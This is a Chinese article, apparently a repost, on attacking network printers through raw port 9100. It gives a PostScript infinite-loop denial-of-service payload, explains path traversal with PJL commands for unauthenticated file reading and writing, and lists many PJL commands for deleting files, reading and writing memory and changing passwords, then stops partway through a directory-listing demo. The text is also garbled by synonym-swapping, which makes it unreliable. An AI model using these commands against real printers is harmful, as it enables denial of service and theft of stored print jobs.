不行忽视的打印机裂痕研究

当向打印机9100端口发送任何数据，打印机都可将其打印出来，文章前部门发明，9100端口还支持原始打印、PCL、PostScript和PJL，即可以通过9100端口执行PJL。当执行DOS，则可无穷轮回打印使命，导致打印使命不绝执行，资源耗尽，无法执行打印操纵。按小我私人领略简朴点说，就是当提倡打印使命时，打印机等使命提倡竣事，才会执行下一步的打印操纵，假如一向轮回打印使命，则无法达到下一步。通过几行PostScript代码实现DOS。

PS代码实现的轮回：

%!  
{} loop 

3. 路径遍历裂痕-案例说明

这不是针对某个型号的裂痕，算是打印机的一个通用裂痕，可以通过../等举办目次穿越，对文件举办读取和写入，不外并不是全部的目次文件都可读写，当发明无法读写时，可继承切换其余目次测试，也许存在可读写的文件，从而泄漏敏感文件，如“Jobs”目次中存储的就是打印使命，可以通过PFT 、PRET器材包读取存储在个中的任何打印使命。

假如应承 PJL 呼吁会见该装备的文件体系，长途进攻者可以借助 PJL 读取恣意文件，长途毗连打印机并举办遍历目次操纵。这里借用小我私人之前的案例演示，通过9100端口执行PJL呼吁，而且未授权会见打印机。在进修之前，必要认识PJL呼吁。如下是本人对PJL呼吁的清算：

@PJL FSDELETE NAME = “pathname” [<CR>]<LF>                           # 删除文件   
 
@PJL FSDOWNLOAD FORMAT:BINARY [SIZE=int] [<CR>]<LF>                  # 下载文件到打印机 
 
@PJL FSINIT VOLUME = “pathname” [<CR>]<LF>                           # 初始化打印机文件体系 
 
@PJL FSMKDIR NAME = “pathname” [<CR>]<LF>                            # 建设目次 
 
@PJL DINQUIRE CPLOCK                                                 # 搜查节制面板状态 
 
@PJL DINQUIRE PASSWORD                                               # 搜查暗码掩护状态 
 
@PJL JOB PASSWORD = [Number:0 to 65535]                              # 当前暗码掩护暗码 
 
@PJL DEFAULT PASSWORD [Number:0 to 65535]                            # 修改掩护暗码 
 
@PJL DEFAULT CPLOCK = [ON, OFF]                                      # 节制面板状态 
 
@PJL SET IOBUFFER = [ON, OFF, AUTO]                                  # 配置缓冲区 
 
@PJL SET IOSIZE = [10-100]                                           # 配置缓存区巨细 
 
@PJL SET PCNAME = [String]                                           # 配置计较机名称 
 
@PJL SET HOLD = [ON, JOB, STORE, PROOF]                              # 配置文件生涯 
 
@PJL SET HOLDKEY = [Number:0000 to 9999]                             # 配置生涯文件暗码 
 
@PJL DEFAULT DISKLOCK = [ON, OFF]                                    # 配置硬盘锁定状态 
 
@PJL SET SPOOLTIME                                                   # 配置打印日期 
 
@PJL SET COPIES                                                      # 配置打印数 
 
@PJL SET JOBNAME                                                     # 配置打印机文件名称 
 
@PJL SET RESOLUTION                                                  # 配置判别率 
 
@PJL SET DRIVERNAME                                                  # 配置驱动 
 
@PJL USTATUS JOB                                                     # 输出 行列中还未打印使命的 状态 
 
@PJL COMMENT                                                         # 添加注释 
 
@PJL SET OUTTRAY                                                     #出纸盘(纸张输出位置) 
 
@PJL SET ORIENTATION = [PORTRAIT, LANDSCAPE]                         #页面偏向 
 
@PJL SET DUPLEX = [ON, OFF]                                          #双工模式(双面打印) 
 
@PJL SET BINDING = [LONGEDGE, SHORTEDGE]                             #双工模式：短边、长边 
 
@PJL RNVRAM ADDRESS                                                  #读取内存 
 
@PJL OPMSG DISPLAY                                                   #配置打印机离线脱机 
 
@PJL SET SERVICEMODE                                                 #配置处事模式 
 
@PJL WNVRAM ADDRESS                                                  #写入内存 
 
@PJL FSDIRLIST NAME                                                  #读取目次 
 
@PJL FSQUERY NAME                                                    #读取文件 
 
@PJL FSUPLOAD NAME                                                   #文件上传 
 
@PJL FSDOWNLOAD                                                      #写入文件 

(1) @PJL FSDIRLIST NAME=”0:/” ENTRY=1 COUNT=1024

上图发明目次名称是 0：/，有两个目次，一个是当地目次./，一个是../目次。

(2) 读取 ../ 目次，发明其下有7个，./代表本目次

（编辑：湖南网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!